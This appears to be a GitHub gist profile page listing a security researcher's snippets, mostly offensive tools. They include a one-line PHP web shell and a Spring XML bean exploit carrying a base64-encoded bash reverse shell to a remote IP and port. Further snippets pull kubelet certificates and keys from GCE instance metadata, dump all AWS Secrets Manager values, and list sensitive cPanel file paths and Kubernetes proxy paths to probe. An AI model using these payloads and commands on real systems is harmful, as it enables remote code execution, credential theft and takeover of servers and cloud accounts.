Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Hacking!

Robbie random-robbie

💭
Hacking!
View GitHub Profile
View logstash.conf
input {
file {
type => "app"
path => ["/home/u/archives/urlteam_2021-02-27-21-17-02/goo-gl/______.txt"]
start_position => "beginning"
sincedb_path => "/dev/null"
}
}
View cpanel.txt
/$USER_wrdp1.sql
/$USER_wpdb.sql
/home/$USER/mail/dovecot-uidlist
/var/spool/exim/input/i/1lE8Ii-0006Gf-LV-D
/var/log/cpanel-install.log
/var/log/exim_mainlog
/var/log/mysqld.log
/var/log/cron
/var/log/maillog
/var/log/exim_mainlog-20210221.gz
View shell.php
<?php
system($_REQUEST['cmd']);
?>
View phpobject.php
<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2
View exploit.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== | base64 -d | bash]]></value>
View wp-scan.md
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
View gce-to-master.txt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
View namespaces.txt
/api/v1/namespaces/absdataservice/services/uat-absdataservice:http/proxy
/api/v1/namespaces/absdataservice/services/uat-absdataservice:https/proxy
/api/v1/namespaces/admin/services/prometheus-alertmanager:http/proxy
/api/v1/namespaces/admin/services/prometheus-blackbox-exporter:http/proxy
/api/v1/namespaces/admin/services/prometheus-kube-state-metrics:http/proxy
/api/v1/namespaces/admin/services/prometheus-pushgateway:http/proxy
/api/v1/namespaces/admin/services/prometheus-server:http/proxy
/api/v1/namespaces/admin/services/traefik:http/proxy
/api/v1/namespaces/admin/services/traefik:https/proxy
/api/v1/namespaces/ango-demo/services/ango-admin:http/proxy
@random-robbie
random-robbie / secrets-dump.sh
Created Jun 10, 2020
./secrets-dump.sh | tee sec.txt
View secrets-dump.sh
#!/bin/bash
for sec in `aws secretsmanager list-secrets | jq -r '.SecretList[].Name'`; do
aws secretsmanager get-secret-value --secret-id $sec
done
View elastic-juice.sh
#!/bin/bash
for env in `aws elasticbeanstalk describe-environments | jq -r '.Environments[].EnvironmentName'`; do
aws elasticbeanstalk retrieve-environment-info --environment-name $env --info-type tail
done